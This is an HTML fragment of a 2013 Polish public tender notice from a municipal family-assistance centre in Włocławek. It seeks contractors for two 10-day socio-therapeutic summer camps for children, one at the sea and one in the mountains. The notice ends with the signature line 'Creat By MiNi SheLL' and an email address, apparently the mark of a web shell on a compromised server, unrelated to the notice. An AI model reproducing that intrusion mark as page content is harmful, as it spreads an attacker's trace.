</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">opisy, fotografie, prospekty, ulotki oferowanej placówki wypoczynku, również mapki przedstawiające obiekt i jego najbliższe otoczenie</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) opracowany przez wykonawcę dzienny harmonogram pobytu (opis 10 dniowego pobytu, dzień po dniu) na danym turnusie kolonijnym, uwzględniający program zajęć kulturalno - rozrywkowych, oraz program zajęć socjoterapeutycznych. Minimalne wymagania programowe określone są w rozdziale II SIWZ w punktach: 16, 17, 18. Przy tworzeniu harmonogramu wymagane jest uwzględnienie ilości dzieci przebywających na turnusie kolonijnym oraz ich wieku, a także miejsca odbywania turnusu. W harmonogramie zawarte muszą być założenia poszczególnych zajęć z określeniem ich celu i planowanej formy przebiegu oraz oczekiwanych rezultatów dotyczących dzieci i młodzieży. Harmonogram będzie stanowił podstawę do indywidualnej oceny ofert przez każdego członka komisji przetargowej w kryterium program pobytu (SPORZĄDZA WYKONAWCA); 2) oświadczenie o spełnieniu wymogu dotyczącego wykupienia polisy ubezpieczeniowej dla kolonistów w zakresie NNW (SPORZĄDZA WYKONAWCA), 3) oświadczenie o spełnieniu wymogu dotyczącego wykupienia polis ubezpieczeniowych dla kadry kolonijnej, zgodnie z warunkiem opisanym w rozdziale VIII SIWZ w pkt 4 ppkt 8) (SPORZĄDZA WYKONAWCA); 4) oświadczenie o wysokości dziennej stawki żywieniowej i spełnianiu warunku zapewnienia właściwych norm energetycznych posiłków dzieciom i młodzieży (SPORZĄDZA WYKONAWCA).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.5</li>
<li>2 - Standard placówki wypoczynku - 0.25</li>
<li>3 - Program pobytu - 0.25</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mopr.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie, ul. Mazowiecka 5, 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Rodzinie, ul. Mazowiecka 5, 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 10-dniowy turnus kolonijny dla 45 dzieci i młodzieży szkolnej z miejscem wypoczynku w miejscowości zlokalizowanej nad polskim morzem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 10-dniowy turnus kolonijny dla 45 dzieci i młodzieży szkolnej z miejscem wypoczynku w miejscowości zlokalizowanej nad polskim morzem, z realizacją programu socjoterapeutycznego dla dzieci i młodzieży szkolnej w wieku od 8 do 15 lat, które korzystają ze Świetlic Miejskiego Ośrodka Pomocy Rodzinie we Włocławku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 60.17.00.00-0, 63.51.10.00-4, 66.61.21.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.5</li>
<li>2. Standard placówki wypoczynku - 0.25</li>
<li>3. Program pobytu - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 10-dniowy turnus kolonijny dla 45 dzieci i młodzieży szkolnej z miejscem wypoczynku w miejscowości zlokalizowanej w polskich górach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 10-dniowy turnus kolonijny dla 45 dzieci i młodzieży szkolnej z miejscem wypoczynku w miejscowości zlokalizowanej w polskich górach, z realizacją programu socjoterapeutycznego dla dzieci i młodzieży szkolnej w wieku od 8 do 15 lat, które korzystają ze Świetlic Miejskiego Ośrodka Pomocy Rodzinie we Włocławku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 60.17.00.00-0, 63.51.10.00-4, 66.61.21.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.5</li>
<li>2. Standard placówki wypoczynku - 0.25</li>
<li>3. Program pobytu - 0.25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com